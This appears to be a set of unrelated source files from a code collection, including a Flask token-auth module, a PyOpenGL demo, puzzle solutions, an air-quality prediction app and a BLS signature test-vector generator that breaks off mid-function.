BOUND\\\"; }}};\")\r\n return lines\r\n\r\n\r\ndef enum_generic_to_string():\r\n return \"\"\"\r\n template class Enum {\r\npublic:\r\n static std::string ToString(TEnum) {\r\n return \"ENUMERATION VALUE OUT OF BOUND\";\r\n }\r\n};\"\"\"\r\n\r\n\r\ndef main():\r\n is_enum_class = True\r\n input_file_path = \"enum/Enum_Template.cpp\"\r\n cppHeader = get_cpp_header_info(input_file_path)\r\n print(\"#ifndef ENUM_HPP\")\r\n print(\"#define ENUM_HPP\")\r\n for header in cppHeader.includes:\r\n print(\"#include {0}\".format(header))\r\n print()\r\n lines = enum_definitions(cppHeader, is_enum_class)\r\n print(\"\\n\".join(lines))\r\n print(enum_generic_to_string())\r\n lines = enum_to_string(cppHeader, is_enum_class)\r\n print(\"\\n\".join(lines))\r\n print(\"\\n#endif // ENUM_HPP\")\r\n\r\n\r\n# python enum_helper.py | clang-format.exe > Enum.hpp\r\n# python .\\enum_helper.py | clang-format.exe | Out-File -Encoding utf8NoBOM \"Enum.hpp\"\r\nmain()\r\n","sub_path":"compiler/scripts/cpp_enum_generator.py","file_name":"cpp_enum_generator.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"550743621","text":"# -*- coding: utf-8 -*-\n__author__ = 'bliss'\n\nfrom flask import jsonify, request, g\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom itsdangerous import SignatureExpired, BadSignature\nfrom flask import current_app\n\nfrom herovii.service import account\nfrom herovii.libs.error_code import AuthFailed, ParamException, JSONStyleError\nfrom herovii.libs.bpbase import ApiBlueprint, auth\nfrom herovii.validator.forms import GetTokenForm\nfrom herovii.libs.scope import is_in_scope\nfrom herovii.libs.enums import AccountTypeEnum\n\napi = ApiBlueprint('token')\n\n\n@api.route('', methods=['POST'])\ndef get_token():\n \"\"\"获取令牌\"\"\"\n # uid = g.uid\n form = GetTokenForm.create_api_form()\n uid_scope = verify_user(form.account.data, form.secret.data, form.type.data)\n if uid_scope is None:\n raise AuthFailed(error='id or password is incorrect', error_code=1005)\n expiration = current_app.config['TOKEN_EXPIRES_IN']\n token = generate_auth_token(uid_scope[0], form.type.data, uid_scope[1], expiration)\n return jsonify({'token': token.decode('ascii')}), 201\n\n\n@api.route('/info', methods=['POST'])\ndef get_token_info():\n \"\"\"获取令牌信息\"\"\"\n json = request.get_json(force=True, silent=True)\n if not json:\n raise JSONStyleError()\n else:\n s = Serializer(current_app.config['SECRET_KEY'])\n token = json['token']\n try:\n data = s .loads(token, return_header=True)\n except SignatureExpired:\n raise AuthFailed(error='token is expired', error_code=1003)\n except BadSignature:\n raise AuthFailed(error='token is invalid', error_code=1002)\n\n r = {\n 'scope': data[0]['scope'],\n 'create_at': data[1]['iat'],\n 'expire_in': data[1]['exp'],\n 'uid': data[0]['uid']\n }\n return jsonify(r), 200\n\n\ndef refresh_token():\n pass\n\n\ndef verify_user(ac, secret, ac_type):\n \"\"\"验证用户身份\"\"\"\n try:\n if isinstance(ac_type, int) or str.isnumeric(ac_type):\n ac_type = int(ac_type)\n ac_type = AccountTypeEnum(ac_type)\n else:\n ac_type = AccountTypeEnum[ac_type]\n except ValueError:\n raise ParamException(error='the type parameter is not in range')\n promise = {\n AccountTypeEnum.app: account.verify_in_heroapi,\n AccountTypeEnum.use_csu_social: account.verify_in_csu_by_social,\n AccountTypeEnum.user_csu_mobile: account.verify_in_csu_by_mobile,\n AccountTypeEnum.user_org_mobile: account.verify_in_org_by_mobile,\n AccountTypeEnum.user_stats_account: account.verify_in_stats_by_account,\n }\n return promise.get(ac_type)(ac, secret)\n\n\n@auth.verify_password\ndef verify_password(token, password):\n # password这里没有用,但是由于使用了http-auth库,所以占时保留\n if current_app.config['REMOVE_TOKEN_VERIFY']:\n return True\n user_info = verify_auth_token(token)\n if not user_info:\n return False\n else:\n g.user = user_info\n return True\n\n\n@auth.error_handler\ndef error_handler():\n raise AuthFailed()\n\n\ndef generate_auth_token(uid, ac_type, scope, expiration=7200):\n \"\"\"生成令牌\"\"\"\n s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)\n return s.dumps({'uid': uid, 'type': int(ac_type), 'scope': scope})\n\n\ndef verify_auth_token(token):\n \"\"\"验证令牌的合法性\"\"\"\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n # data = s.loads(token)\n data = s.loads(token)\n except SignatureExpired:\n raise AuthFailed(error='token is expired', error_code=1003)\n # return None # valid token, but expired\n except BadSignature:\n raise AuthFailed(error='token is invalid', error_code=1002)\n # return None # invalid token\n\n uid = data['uid']\n scope = data['scope']\n ac_type = data['type']\n if not current_app.config['REMOVE_SCOPE_CONTROL']:\n allow = is_in_scope(scope, request.endpoint)\n if not allow:\n raise AuthFailed(error='forbidden,not in scope', error_code=1004, code='403')\n return [uid, ac_type]\n\n\n","sub_path":"herovii/api/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"167283500","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nmap.py\n\nCreated by 刘 智勇 on 2012-03-07.\nCopyright (c) 2012 __MyCompanyName__. All rights reserved.\n\"\"\"\n\nimport logging\nimport uuid\nfrom datetime import datetime\nimport time\n\nfrom huwai.config import DB_CON, DB_NAME, DEFAULT_CUR_UID\nfrom modules import MapDoc\nfrom api import API\n\nclass Map(object):\n def __init__(self, id=None, api=None):\n self._api = api if api else MapAPI()\n if id:\n ret = self._api.one(_id=id)\n self.info, self.eid = (ret[1], ret[1]['_id']) if ret[0] else (None, None)\n \n def __getattr__(self, key):\n if hasattr(self, 'info') and self.info and (key in self.info):\n return self.info[key]\n else:\n return None\n \nclass MapAPI(API):\n def __init__(self):\n DB_CON.register([MapDoc])\n datastore = DB_CON[DB_NAME]\n col_name = MapDoc.__collection__\n collection = datastore[col_name]\n doc = collection.MapDoc()\n API.__init__(self, col_name=col_name, collection=collection, doc=doc)\n \n def save(self, owner, subject, location=None, polyline=None, link=None, **kwargs):\n return super(MapAPI, self).create(owner=owner, subject=subject, location=location, polyline=polyline, link=link, **kwargs)\n \n def _output_format(self, result=[], cuid=DEFAULT_CUR_UID):\n now = datetime.now()\n output_map = lambda i: {'id':i['_id'], 'added_id':i['added_id'], 'owner':i['owner'], 'is_own':(cuid==i['owner'] if i['owner'] else True), 'created':self._escape_created(now, i['created']), 'subject':i['subject'], 'link':i['link'], 'polyline':i['polyline'], 'location':i['location']}\n if isinstance(result, dict):\n return output_map(result)\n return map(output_map, result)\n \n def get(self, id):\n r = self.one(_id=id)\n if (r[0] and r[1]):return (True, self._output_format(result=r[1]))\n return r\n \n def near(self, cuid=DEFAULT_CUR_UID, near=[]):\n r = self.find(**{\"location\": {\"$near\": near}})\n if r[0]:\n kw = {'result':r[1]}\n if cuid:kw['cuid']=cuid\n l = self._output_format(**kw)\n return (True, l)\n else:\n return (False, r[1])\n \n def list(self, cuid=DEFAULT_CUR_UID, owner=None, subject=None, location=None):\n kwargs = {}\n if owner:kwargs['owner']=owner\n if subject:kwargs['subject']={'$in':subject}\n if topic:kwargs['topic'] = {'$in':topic} if isinstance(topic, list) else topic\n r = self.find(**kwargs)\n if r[0]:\n kw = {'result':r[1]}\n if cuid:kw['cuid']=cuid\n l = self._output_format(**kw)\n return (True, l)\n else:\n return (False, r[1])\n \n \n \n ","sub_path":"apps/imap.py","file_name":"imap.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"370611958","text":"import numpy as np\n\nradius = 5\nl_cube = 10\n\nbasis = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype = int)\n\ndef get_pos(translations):\n t = np.array(translations, dtype = int)\n return np.matmul(t, basis)\n\nwith open(\"defects_sphere.txt\", 'w') as f:\n center = get_pos([l_cube/2, l_cube/2, l_cube/2])\n\n for a in range(l_cube):\n for b in range(l_cube):\n for c in range(l_cube):\n d = np.linalg.norm( get_pos([a, b, c]) - center )\n if d > radius:\n f.write(\"0 {0} {1} {2} -1\\n\".format(a, b, c))\n\n","sub_path":"util/write_sphere_defects.py","file_name":"write_sphere_defects.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163524144","text":"#! /usr/bin/env python\n\nimport argparse\nimport requests\nimport time\n\n#\n# Author: Leandro Beretta \n#\n# Script to test traffic routing with A/B deployments in OpenShift\n#\n\n\ndef create_arg_parser():\n \"\"\" Creates the argument parser to user. \"\"\"\n\n custom_parser = argparse.ArgumentParser(description='Test traffic routing with A/B deployments in OpenShift')\n\n custom_parser.add_argument('url',\n metavar='url',\n type=str,\n help='The URL to test the service (GET Method used)')\n\n custom_parser.add_argument('N',\n metavar='n',\n type=int,\n help='The number of requests to execute')\n\n return custom_parser\n\n\nif __name__ == '__main__':\n parser = create_arg_parser()\n args = parser.parse_args()\n\n try:\n for n in range(1, args.N + 1):\n response = requests.get(args.url)\n body = response.json()\n\n print('Request: {:2} - Status Code: {} - Version: {}'.format(n, response.status_code, body['version']))\n\n time.sleep(1)\n except KeyboardInterrupt:\n quit(0)","sub_path":"demo/traffic_tester.py","file_name":"traffic_tester.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"229324191","text":"\"\"\"\nExample \"downtime\" server\n\nWhen a user tries to connect, the server will kick them with the MOTD\n\"\"\"\n\nfrom quarry.net.server import ServerFactory, ServerProtocol\n\n\nclass DowntimeProtocol(ServerProtocol):\n def packet_login_start(self, buff):\n buff.discard()\n self.close(self.factory.motd)\n\n\nclass DowntimeFactory(ServerFactory):\n protocol = DowntimeProtocol\n\n\ndef main(args):\n # Parse options\n import optparse\n parser = optparse.OptionParser(\n usage=\"usage: %prog [options]\")\n parser.add_option(\"-a\", \"--host\",\n dest=\"host\", default=\"\",\n help=\"address to listen on\")\n parser.add_option(\"-p\", \"--port\",\n dest=\"port\", default=\"25565\", type=\"int\",\n help=\"port to listen on\")\n parser.add_option(\"-m\", \"--message\",\n dest=\"message\", default=\"We're down for maintenance\",\n help=\"message to kick users with\")\n (options, args) = parser.parse_args(args)\n\n # Create factory\n factory = DowntimeFactory()\n factory.motd = options.message\n\n # Listen\n factory.listen(options.host, options.port)\n factory.run()\n\n\nif __name__ == \"__main__\":\n import sys\n main(sys.argv[1:])","sub_path":"examples/server_downtime.py","file_name":"server_downtime.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500779043","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.model_selection import train_test_split\nTEMPLATES_AUTO_RELOAD=True\n\napp = Flask(__name__)\nmodel = pickle.load(open('model5.pkl', 'rb'))\n\ndf4=pd.read_csv(\"file2.csv\")\ndf5=df4.copy()\n\ndf5=df5.drop(columns=[\"year\",\"month\",\"day\",\"hour\"])\ndf5=df5.reindex([\"wind_speed\",\"wind_direction\",\"pressure\",'rain',\"temperature\",'PM2.5'],axis=1)\nY=df5['PM2.5']\ndf5.drop(columns=[\"PM2.5\"],inplace=True)\nX_train, X_test,Y_train, Y_test = train_test_split(df5, Y, test_size=0.2,random_state=0)\n\nsc2=PowerTransformer()\nsc2.fit(X_train)\nX_train2=sc2.transform(X_train)\nX_test2=sc2.transform(X_test)\n\n\nsc3=PowerTransformer()\nsc3.fit(Y_train.values.reshape(-1,1))\nY_train2=sc3.transform(Y_train.values.reshape(-1,1))\nY_test2=sc3.transform(Y_test.values.reshape(-1,1))\nDict = {0: 'E', 1: 'ENE', 2: 'ESE',3: 'N', 4: 'NE', 5: 'NNE', 6: 'NNW', 7: 'NW', 8: 'S', 9: 'SE', 10:'SSE', 11:'SSW', 12:'SW', 13:'W', 14:'WNW', 15:'WSW'}\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n '''\n For rendering results on HTMLGUI\n '''\n float_features = [float(x) for x in request.form.values()]\n final_features = np.array(float_features)\n final_features1=final_features[4:9:1]\n print(final_features1)\n final_features1[4]=final_features1[4]+273\n final_features1=sc2.transform(final_features1.reshape(1,-1))\n prediction = model.predict(final_features1)\n prediction[0]=sc3.inverse_transform(prediction[0].reshape(1,-1))\n output = prediction[0].astype(\"int\")\n index=final_features[5].astype(\"int\")\n temp=(final_features[8]-273)\n temp=round(temp,2)\n return render_template('index.html', prediction_text1='Year= {}'.format(final_features[0].astype(\"int\")),\n prediction_text2='Month= {}'.format(final_features[1].astype(\"int\")),\n prediction_text3='Day= {}'.format(final_features[2].astype(\"int\")),\n prediction_text4='Hour= {}'.format(final_features[3].astype(\"int\")),\n prediction_text5='Wind Speed= {}'.format(final_features[4]),\n prediction_text6='Wind Direction= {}'.format(Dict[index]),\n prediction_text7='Pressure= {}'.format(final_features[6]),\n prediction_text8='Rain= {}'.format(final_features[7]),\n prediction_text9='Temperature= {}'.format(temp),\n prediction_text='PM2.5 concentration is {}'.format(output))\n@app.route('/predict_api',methods=['POST'])\ndef predict_api():\n '''\n For direct API calls trought request\n '''\n data = request.get_json(force=True)\n prediction = model.predict([np.array(list(data.values()))])\n\n output = prediction[0]\n return jsonify(output)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"329168412","text":"# coding: utf-8\nimport array, bisect, collections, copy, heapq, itertools, math, random, re, string, sys, time\n\nsys.setrecursionlimit(10 ** 7)\nINF = 10 ** 20\nMOD = 10 ** 9 + 7\n\n\ndef II(): return int(input())\ndef ILI(): return list(map(int, input().split()))\ndef IAI(LINE): return [ILI() for __ in range(LINE)]\ndef IDI(): return {key: value for key, value in ILI()}\n\n\ndef read():\n N, A, B, C, D = ILI()\n return N, A, B, C, D\n\n\ndef solve(N, A, B, C, D):\n dif_ab = abs(B - A)\n dif_cd = D - C\n n_dif = N - 1\n\n d_div, d_mod = divmod(dif_ab, D)\n\n if d_div > n_dif:\n return \"NO\"\n else:\n n_dif_rest = n_dif - d_div\n dif_rest = d_mod\n if n_dif_rest == 0:\n if d_mod == 0:\n return \"YES\"\n else:\n return \"NO\"\n else:\n if d_mod >= C:\n dif_rest -= C\n n_dif_rest -= 1\n\n if n_dif_rest % 2 == 1:\n dif_rest += C\n n_dif_rest -= 1\n\n if dif_rest <= n_dif_rest * dif_cd:\n return \"YES\"\n\n return \"NO\"\n\n\ndef main():\n params = read()\n print(solve(*params))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"AGC_017/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364442429","text":"\"\"\"\nSuppose an arithmetic expression is given as a binary tree. Each leaf is an integer\nand each internal node is one of '+', '−', '∗', or '/'.\n\nGiven the root to such a tree, write a function to evaluate it.\n\nFor example, given the following tree:\n\n *\n / \\\n + +\n / \\ / \\\n3 2 4 5\nYou should return 45, as it is (3 + 2) * (4 + 5).\n\"\"\"\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef solve_graph(root):\n if root.val.isnumeric():\n return float(root.val)\n\n return eval(\"{} {} {}\".format(solve_graph(root.left), root.val, solve_graph(root.right)))\n\n\nnode_a = Node(\"*\")\nnode_b = Node(\"+\")\nnode_c = Node(\"3\")\nnode_d = Node(\"2\")\nnode_e = Node(\"+\")\nnode_f = Node(\"4\")\nnode_g = Node(\"5\")\n\nnode_a.left = node_b\nnode_b.left = node_c\nnode_b.right = node_d\nnode_a.right = node_e\nnode_e.left = node_f\nnode_e.right = node_g\n\nprint(solve_graph(node_a))\nprint(solve_graph(node_e))\n","sub_path":"Coding_Challenges/problem_50.py","file_name":"problem_50.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"127219909","text":"import nltk, unicodedata\n\nstopwords = nltk.corpus.stopwords.words('english')\nall_content = \"\"\nfor c in json_list:\n for d in c:\n content = \" \".join([d['text'] for d in c])\n all_content += content + ' '\n\nall_content = all_content.lower()\nall_content = unicodedata.normalize('NFKD', all_content).encode('ascii', 'ignore')\n\ntokens = all_content.split()\nnonstop_tokens = [w for w in tokens if not w in stopwords]\ntext = nltk.Text(nonstop_tokens)\nbgms = nltk.bigrams(nonstop_tokens)\ntgms = nltk.trigrams(nonstop_tokens)\nunidist = text.vocab() # able to query by freq of terms using fdist['term']\n\nbgm_dist = nltk.FreqDist(bgms)\ntgm_dist = nltk.FreqDist(tgms)\n\n# Look into more available in NLTK metrics package","sub_path":"scripts/nltk_stats.py","file_name":"nltk_stats.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"303458","text":"# import the pygame module, so you can use it\nimport pygame\nimport random\nimport numpy\nimport glm # pip3 install pyglm\nimport pyassimp # pip3 install pyassimp\nfrom OpenGL.GL import *\nfrom OpenGL.GL.shaders import compileProgram, compileShader\n\n# define a main function\n\n# initialize the pygame module\npygame.init()\n\n# create a surface on screen that has the size of 240 x 180\nscreen = pygame.display.set_mode((800, 600), pygame.OPENGL | pygame.DOUBLEBUF)\nclock = pygame.time.Clock()\n\nglClearColor(0.5, 1.0, 0.5, 1.0)\n\nvertex_shader = \"\"\"\n#version 460\nlayout (location = 0) in vec3 position;\nlayout (location = 1) in vec3 vertexColor;\nout vec3 ourColor;\nuniform mat4 superMatriz;\n\nvoid main()\n{\n gl_Position = superMatriz * vec4(position.x, position.y, position.z, 1.0);\n ourColor = vertexColor;\n}\n\"\"\"\n\nfragment_shader = \"\"\"\n#version 460\nlayout(location = 0) out vec4 fragColor;\n\nin vec3 ourColor;\n\nvoid main()\n{\n fragColor = vec4(ourColor, 1);\n}\n\"\"\"\n\nshader = compileProgram(\n compileShader(vertex_shader, GL_VERTEX_SHADER),\n compileShader(fragment_shader, GL_FRAGMENT_SHADER)\n)\n\n\nvertex_data = numpy.array([\n 0.5, 0.5, 0.0, 1, 0, 0, # top right\n 0.5, -0.5, 0.0, 0, 1, 0, # bottom right\n -0.5, -0.5, 0.0, 0, 0, 1, # bottom left\n -0.5, 0.5, 0.0, 1, 1, 0, # top left\n], dtype=numpy.float32)\n\nindex_data = numpy.array([\n 0, 1, 3, # first triangle\n 1, 2, 3 # second triangle\n], dtype=numpy.uint32)\n\nvertex_array_object = glGenVertexArrays(1)\nglBindVertexArray(vertex_array_object)\n\nvertex_buffer_object = glGenBuffers(1)\nglBindBuffer(GL_ARRAY_BUFFER, vertex_buffer_object)\nglBufferData(GL_ARRAY_BUFFER, vertex_data.nbytes, vertex_data, GL_STATIC_DRAW)\n\nelement_buffer_object = glGenBuffers(1)\nglBindBuffer(GL_ELEMENT_ARRAY_BUFFER, element_buffer_object)\nglBufferData(GL_ELEMENT_ARRAY_BUFFER, index_data.nbytes, index_data, GL_STATIC_DRAW)\n\nglVertexAttribPointer(\n 0, # attribute 0. No particular reason for 0, but must match the layout in the shader.\n 3, # size\n GL_FLOAT, # type\n GL_FALSE, # normalized?\n 4 * 6, # stride\n ctypes.c_void_p(0) # array buffer offset\n)\nglEnableVertexAttribArray(0)\n\n\nglVertexAttribPointer(\n 1, # attribute 0. No particular reason for 0, but must match the layout in the shader.\n 3, # size\n GL_FLOAT, # type\n GL_FALSE, # normalized?\n 4 * 6, # stride\n ctypes.c_void_p(4 * 3) # array buffer offset\n)\nglEnableVertexAttribArray(1)\n\n\n\ni = glm.mat4(1)\n\ntranslate = glm.translate(i, glm.vec3(0, 0, 0))\nrotate = glm.rotate(i, 0, glm.vec3(0, 1, 0))\nscale = glm.scale(i, glm.vec3(1, 1, 1))\n\nmodel = translate * rotate * scale\nview = glm.lookAt(glm.vec3(0, 0, 2), glm.vec3(0, 0, 0), glm.vec3(0, 1, 0))\nprojection = glm.perspective(glm.radians(45), 800/600, 0.1, 1000.0)\n\nsuperMatriz = projection * view * model\n\nglViewport(0, 0, 800, 600)\n\n# define a variable to control the main loop\nrunning = True\n# main loop\ncounter = 0\nwhile running:\n glClear(GL_COLOR_BUFFER_BIT)\n\n glUseProgram(shader)\n\n glUniformMatrix4fv(\n glGetUniformLocation(shader, \"superMatriz\"),\n 1,\n GL_FALSE,\n glm.value_ptr(superMatriz)\n )\n\n # glDrawArrays(GL_TRIANGLES, 0, 6)\n glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_INT, None)\n\n # GL_LINE_LOOP\n \n pygame.display.flip()\n clock.tick(15)\n counter+=1","sub_path":"simple5.py","file_name":"simple5.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"271746060","text":"def sort(list):\n for i in range(len(list)-1):\n j=i+1\n key=list[j]\n while i>=0 and list[i]>key:\n list[i+1]=list[i]\n i=i-1\n list[i+1]=key\n return list\nlist=[2,5,1,4,3]\nprint(sort(list))","sub_path":"Insertsort.py","file_name":"Insertsort.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"414930243","text":"#!/usr/bin/python3\n\nimport sys,numpy\n\nf = [t.strip() for t in sys.stdin]\nM=[]\nfor i in f:\n M.append([int(x) for x in i])\n\nM = numpy.array(M)\nN = M\n\n#print(M)\n\ndef mset(M,F,x,y):\n if x<0 or y<0:\n return\n if x>len(M)-1:\n return\n if y>len(M[x])-1:\n return\n if F[x][y]:\n return\n \n M[x][y]+=1\n \ndef c(M):\n F = M<-1000\n \n M = M + 1\n\n T = M > 9\n cnt=0\n all=False\n while T.any():\n cnt+=sum(sum(T))\n\n for x in range(len(M)):\n for y in range(len(M[x])):\n if T[x][y] and not F[x][y]:\n F[x][y]=True\n M[x][y]=0\n mset(M,F,x-1,y-1)\n mset(M,F,x-1,y)\n mset(M,F,x-1,y+1)\n mset(M,F,x,y-1)\n mset(M,F,x,y+1)\n mset(M,F,x+1,y-1)\n mset(M,F,x+1,y)\n mset(M,F,x+1,y+1)\n T = M > 9\n return(M,cnt,F.all())\n\nflashes=0\nall=-1\nfor i in range(100):\n (M,f,a)=c(M)\n flashes+=f\n if a:\n all=i\n \nprint(\"Answer 1:\",flashes)\ni+=1\n\nif not a:\n while True:\n (M,f,a)=c(M)\n flashes+=f\n if a:\n all=i\n break\n i+=1\n\nprint(\"Answer 2:\",all+1)\n\n","sub_path":"2021/11/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525515192","text":"\"\"\"\nBLS test vectors generator\n\"\"\"\n\nfrom typing import Tuple, Iterable, Any, Callable, Dict\n\nfrom eth_utils import (\n encode_hex,\n int_to_big_endian,\n)\nfrom gen_base import gen_runner, gen_typing\n\nfrom py_ecc import bls\nfrom hashlib import sha256\n\nfrom eth2spec.test.context import PHASE0\n\ndef hash(x):\n return sha256(x).digest()\n\n\nF2Q_COEFF_LEN = 48\nG2_COMPRESSED_Z_LEN = 48\nDST = bls.G2ProofOfPossession.DST\n\n\ndef int_to_hex(n: int, byte_length: int = None) -> str:\n byte_value = int_to_big_endian(n)\n if byte_length:\n byte_value = byte_value.rjust(byte_length, b'\\x00')\n return encode_hex(byte_value)\n\n\ndef hex_to_int(x: str) -> int:\n return int(x, 16)\n\n\nMESSAGES = [\n bytes(b'\\x00' * 32),\n bytes(b'\\x56' * 32),\n bytes(b'\\xab' * 32),\n]\n\nPRIVKEYS = [\n # Curve order is 256 so private keys are 32 bytes at most.\n # Also not all integers is a valid private key, so using pre-generated keys\n hex_to_int('0x00000000000000000000000000000000263dbd792f5b1be47ed85f8938c0f29586af0d3ac7b977f21c278fe1462040e3'),\n hex_to_int('0x0000000000000000000000000000000047b8192d77bf871b62e87859d653922725724a5c031afeabc60bcef5ff665138'),\n hex_to_int('0x00000000000000000000000000000000328388aff0d4a5b7dc9205abd374e7e98f3cd9f3418edb4eafda5fb16473d216'),\n]\n\n\ndef case01_sign():\n for privkey in PRIVKEYS:\n for message in MESSAGES:\n sig = bls.G2ProofOfPossession.Sign(privkey, message)\n identifier = f'{int_to_hex(privkey)}_{encode_hex(message)}'\n yield f'sign_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'privkey': int_to_hex(privkey),\n 'message': encode_hex(message),\n },\n 'output': encode_hex(sig)\n }\n\n\ndef case02_verify():\n for i, privkey in enumerate(PRIVKEYS):\n for message in MESSAGES:\n # Valid signature\n signature = bls.G2ProofOfPossession.Sign(privkey, message)\n pubkey = bls.G2ProofOfPossession.PrivToPub(privkey)\n identifier = f'{encode_hex(pubkey)}_{encode_hex(message)}'\n yield f'verify_valid_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkey': encode_hex(pubkey),\n 'message': encode_hex(message),\n 'signature': encode_hex(signature),\n },\n 'output': True,\n }\n\n # Invalid signatures -- wrong pubkey\n wrong_pubkey = bls.G2ProofOfPossession.PrivToPub(PRIVKEYS[(i + 1) % len(PRIVKEYS)])\n identifier = f'{encode_hex(wrong_pubkey)}_{encode_hex(message)}'\n yield f'verify_wrong_pubkey_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkey': encode_hex(wrong_pubkey),\n 'message': encode_hex(message),\n 'signature': encode_hex(signature),\n },\n 'output': False,\n }\n\n # Invalid signature -- tampered with signature\n tampered_signature = signature[:-4] + b'\\xFF\\xFF\\xFF\\xFF'\n identifier = f'{encode_hex(pubkey)}_{encode_hex(message)}'\n yield f'verify_tampered_signature_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkey': encode_hex(pubkey),\n 'message': encode_hex(message),\n 'signature': encode_hex(tampered_signature),\n },\n 'output': False,\n }\n\n\ndef case03_aggregate():\n for message in MESSAGES:\n sigs = [bls.G2ProofOfPossession.Sign(privkey, message) for privkey in PRIVKEYS]\n yield f'aggregate_{encode_hex(message)}', {\n 'input': [encode_hex(sig) for sig in sigs],\n 'output': encode_hex(bls.G2ProofOfPossession.Aggregate(sigs)),\n }\n\n\ndef case04_fast_aggregate_verify():\n for i, message in enumerate(MESSAGES):\n privkeys = PRIVKEYS[:i + 1]\n sigs = [bls.G2ProofOfPossession.Sign(privkey, message) for privkey in privkeys]\n aggregate_signature = bls.G2ProofOfPossession.Aggregate(sigs)\n pubkeys = [bls.G2ProofOfPossession.PrivToPub(privkey) for privkey in privkeys]\n pubkeys_serial = [encode_hex(pubkey) for pubkey in pubkeys]\n\n # Valid signature\n identifier = f'{pubkeys_serial}_{encode_hex(message)}'\n yield f'fast_aggregate_verify_valid_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkeys': pubkeys_serial,\n 'message': encode_hex(message),\n 'signature': encode_hex(aggregate_signature),\n },\n 'output': True,\n }\n\n # Invalid signature -- extra pubkey\n pubkeys_extra = pubkeys + [bls.G2ProofOfPossession.PrivToPub(PRIVKEYS[-1])]\n pubkeys_extra_serial = [encode_hex(pubkey) for pubkey in pubkeys_extra]\n identifier = f'{pubkeys_extra_serial}_{encode_hex(message)}'\n yield f'fast_aggregate_verify_extra_pubkey_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkeys': pubkeys_extra_serial,\n 'message': encode_hex(message),\n 'signature': encode_hex(aggregate_signature),\n },\n 'output': False,\n }\n\n # Invalid signature -- tampered with signature\n tampered_signature = aggregate_signature[:-4] + b'\\xff\\xff\\xff\\xff'\n identifier = f'{pubkeys_serial}_{encode_hex(message)}'\n yield f'fast_aggregate_verify_tampered_signature_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkeys': pubkeys_serial,\n 'message': encode_hex(message),\n 'signature': encode_hex(tampered_signature),\n },\n 'output': False,\n }\n\n\ndef case05_aggregate_verify():\n pairs = []\n sigs = []\n for privkey, message in zip(PRIVKEYS, MESSAGES):\n sig = bls.G2ProofOfPossession.Sign(privkey, message)\n pubkey = bls.G2ProofOfPossession.PrivToPub(privkey)\n pairs.append({\n 'pubkey': encode_hex(pubkey),\n 'message': encode_hex(message),\n })\n sigs.append(sig)\n\n aggregate_signature = bls.G2ProofOfPossession.Aggregate(sigs)\n yield f'aggregate_verify_valid', {\n 'input': {\n 'pairs': pairs,\n 'signature': encode_hex(aggregate_signature),\n },\n 'output': True,\n }\n\n tampered_signature = aggregate_signature[:4] + b'\\xff\\xff\\xff\\xff'\n yield f'aggregate_verify_tampered_signature', {\n 'input': {\n 'pairs': pairs,\n 'signature': encode_hex(tampered_signature),\n },\n 'output': False,\n }\n\n\ndef create_provider(handler_name: str,\n test_case_fn: Callable[[], Iterable[Tuple[str, Dict[str, Any]]]]) -> gen_typing.TestProvider:\n\n def prepare_fn(configs_path: str) -> str:\n # Nothing to load / change in spec. Maybe in future forks.\n # Put the tests into the general config category, to not require any particular configuration.\n return 'general'\n\n def cases_fn() -> 